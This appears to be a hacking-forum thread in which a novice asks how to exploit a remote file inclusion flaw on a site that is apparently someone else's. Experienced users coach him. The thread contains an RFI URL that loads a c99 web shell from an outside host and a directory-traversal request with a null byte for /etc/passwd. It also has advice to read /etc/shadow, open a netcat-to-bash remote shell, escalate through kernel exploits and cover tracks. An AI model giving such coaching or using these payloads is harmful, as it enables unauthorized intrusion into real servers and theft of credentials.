Waraxe IT Security Portal

sol1dzer0 · Regular user

so i have some questions..

1. first one is about Rfi if i have found Rfi vuln site [atleast i tihnk so] what should i dot next ?!

i have made host and uploaded c99 in it.. and did something like this..

www.vulnsyte.com/index.php?page=http://www.myhost.com/c99.php

but seems nothing happens.. -.-' ! for Rfi there is not many tuts what i have found -.- so im total newB to this.. !

* what is moust common errors which lead to Rfi ?! it would be nice if u could show me exmples like in sql inj. ''You have error in your sql syntax''

* what is ussual next step on Rfi ?! always upload some shell / script or something ?! i dont kinda get it.. ;/

*what should i know to undertstand better Rfi ? 0_o mby someone got some good tutoirals about this ?! [what i know i need to know all about victim ex. what OS is running is there php html. or fp running ect.]

2. Rooting.. hmm yea.. totla 0 for me.. would be nice if i get redir. on some good tutorial.. something like Rooting for n00bs Very Happy

!! what it is what can i do with it.. ex.

so i hope i get some help with this.. !

thankyou.
Embarassed

lenny · Valuable expert

Well are you sure the page is vulnerable to RFI? index.php may have a set of filters to strip out the ":" of "http://", or in fact any URL altogether. Their host may also be set up to disable URL based includes (which is quite common). I believe that URL based includes are OFF in php.ini by default. Those could be your two main problems with your attack currently!

If you do manage to get an include, be sure to upload a shell - just keep it simple. Don't leave files on their server that are unnecessary, or you will arouse their suspicions. My usual approach (strictly lab based attacks, and for pen testing) is to start a netcat instance on their server forwarding to bash - essentially it allows me shell access in a more convinent environment than through a php script! From your makeshift ssh server, you can get to work looking at other expoits, for example in the kernel. Be sure to cover your tracks!

I suppose all that is pretty confusing, so ask away your questions - im here all week Razz

oniric · Advanced user

A rooting paper would be usefull for me too ^_^

Probably PHP is configured to not allow remote file inclusion through HTTP or other net protocols. It's very very common nowadays like lenny said. Such vulns come from code like this:

include "../my/path/.".$_GET['page'].".php";

In such situations you could exploit this to load files that are out of the htdocs folder of the webserver. And you can load file with other extensions beside .php that is automatically added by the code adding a NULL byte to you request like so

http://vulnsite.com/index.php?page=../../etc/passwd%00

That's only an example, also probably you need to urlencode slashes. Please note the use of ../ to traverse file system backward.

Yes, better if you know the victim OS so you can easily locate files on the file system. Just play with paths and directory traversal looking for known file locations like /etc/passwd on linux systems. When you have such information you can start harvesting other usefull information from other files and maybe if the server is running as root opening /etc/shadow file Smile

sol1dzer0 · Regular user

Thank u guys Smile

hmm bit hard to understand this but i will try to learn ;] this is not so easy as SQL injection lol Very Happy

but i thought the same about sql inject. when i didnt know anythin.. ;] ! tnx in advice.. if u two or anybody got something more to say plzz reply ;]

more info = better succes Smile

oniric · Advanced user

Mmm, I think sqli is far more difficult ^_^ You need to know SQL, not always but in many cases.

One thing more: NULL Byte, %00, works because it's the urlencoded version of \0, the C,C++ NULL Byte also known as the string terminator. So if the string sequence is

mystring%00isasd

php would "see" only mystring.

sol1dzer0 · Regular user

oniric · Advanced user

Ah no, thx, SQLi it's my field ^_^ I really like it, and exploiting it it's such fun Smile

lenny · Valuable expert

I try and stay away form SQL injection Smile

I really dislike it! I prefer somthing more solid, and that includes social engineering! It is a valid form of hacking, and it has served me well (and solidly) on many occasions!

Anyway, do you need any more information? or should that suffice for now? Keep us informed, we can always help out if you need further assistance! Wink

sol1dzer0 · Regular user

yea somebody likes sql and somebody dislikes it ! ;]

and about Rfi right now it's ok will try to read some more stuff and learn more ;] ! mby someone in IRC will help me ;D
btw i cannot connect to this site irc channel.. plugin missing and i cannot download it.. -.-' damn.. wantedt to talk with you guys !!

anyway thankyou u all !! you are kind ppl Wink

!

oniric · Advanced user

Or LFI, more common Wink

Probably your best bet, as I and lenny said RFI in PHP is no longer so common. There's a setting in php.ini, called allow_url_fopen, that's commonly set to Off. And also if the code it's like

include "somethinghere".$_GET['page'];

you can't overwrite the somethinghere part so you can't call external http files in such a case ( very common ).